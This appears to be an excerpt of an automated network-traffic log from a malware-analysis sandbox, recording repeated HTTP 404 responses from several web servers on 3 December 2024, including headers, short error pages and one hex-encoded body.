            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:56:58 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:57:00 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:57:22 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:57:25 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:57:28 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:57:31 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-litespeed-tag: 02a_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hw03VwLkAd0RF9MMaI8aynrzA5hNm0aQ%2FhhkhwME3YrGP3PQe88G8pDO%2BY9KZCbVblLTD%2B5GPRxTzjD8uvDJzeO97SgiBNrr9pCvhqCqMVDlfWXOewIIw%2F3dGeEnMtlxFSnh3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec570a779243361-MIA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=126366&min_rtt=126366&rtt_var=63183&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-litespeed-tag: 02a_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aH3h5tIDtTo7sQb4DSextTZRSfeTV4p4%2B0GNO39lMMaUFmwZW9qNGcEnuZNhX2wUCbx7gvFQLhSr8kwLNUjeZFPEo7HnAfZCRZVubJKi8%2F3EpdyZvkxa5touSu0pNRNRIhY52Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec570b81aa9743a-MIA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=126373&min_rtt=126373&rtt_var=63186&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-litespeed-tag: 02a_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bekwnpnHiCweh7hL9l30DQCIn9ZQSr%2BZC7Q19SXSaY5sr8MvXTObcGm8TL8MVEwLVmrLeQ%2F8LsQCDumdN2vjWgB6aCKOOnxbTxH9pKo0mc1g0QU01jXzhpRDlhyGMb%2B7KN%2FGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec570c8b9478dfd-MIA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=126813&min_rtt=126813&rtt_var=63406&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7927&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:57:51 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EoCW232EuO0Bk0uqaGzxdC211O969fmJhDI5v4KRKVQEdGzhoj3KmWqjsu0RGRBsfVB%2BKNubf9p20R00Q9gE3FZwYLtyX1jSh8bQZUR3HT2NqeYVTRQ%2BH6SCwy7aHzZjFO3hmngqPQU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec571009b465c6b-MIA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=126450&min_rtt=126450&rtt_var=63225&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:57:53 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFp%2Fh0lJmMUcCwHLUbIN28YRo%2BNEfPQbqXL%2B9vHhWK9a38RvMguNmfe4gZ3qos%2BbwscuFYZoLz17DcGZYhXuSwyoZMV08BpcBi3uzOSm5oDyMEysOM9PeH7Mj99AYTkOfQALQ2oeoQk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec571112a6c9ab4-MIA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=126055&min_rtt=126055&rtt_var=63027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:57:56 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2F6r0VbfSlBrKDvHw5UcOQmwubrjr7On0EU96h1azsBE00BDqBsuvFJm7MgOxaDvQArDDlBqRA4NAWCIvWUWW%2BmOF%2BzBdvc%2BywGYmPgTKm11Mej%2Fam4pV9gQVEG4%2FDAEhcNDEXa3A9U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec57121ce4cd9b9-MIA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=126193&min_rtt=126193&rtt_var=63096&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7939&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:57:59 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sVGni9JOIlMPUuWw8s7Klc3Bya8rScV1pDh3A0O089tzEpZKxTnidLz0QgTp9G3yOAo5WpbJkzP6ws0fPkEqIuf55l7NArQ2su3VHV5Y7TXBwCcPYF%2F8ZZeRaJGazlVxIydtsU6FlM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec571325a157497-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=126725&min_rtt=126725&rtt_var=63362&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:58:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:58:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Tue, 03 Dec 2024 17:58:10 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Tue, 03 Dec 2024 17:58:13 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Tue, 03 Dec 2024 17:58:44 GMT
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 03 Dec 2024 17:59:03 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 03 Dec 2024 17:59:06 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 03 Dec 2024 17:59:08 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 03 Dec 2024 17:59:11 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Tue, 03 Dec 2024 17:59:30 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Tue, 03 Dec 2024 17:59:33 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Tue, 03 Dec 2024 17:59:36 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Tue, 03 Dec 2024 17:59:39 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 03 Dec 2024 17:59:58 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 03 Dec 2024 18:00:01 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 03 Dec 2024 18:00:04 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 03 Dec 2024 18:00:07 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
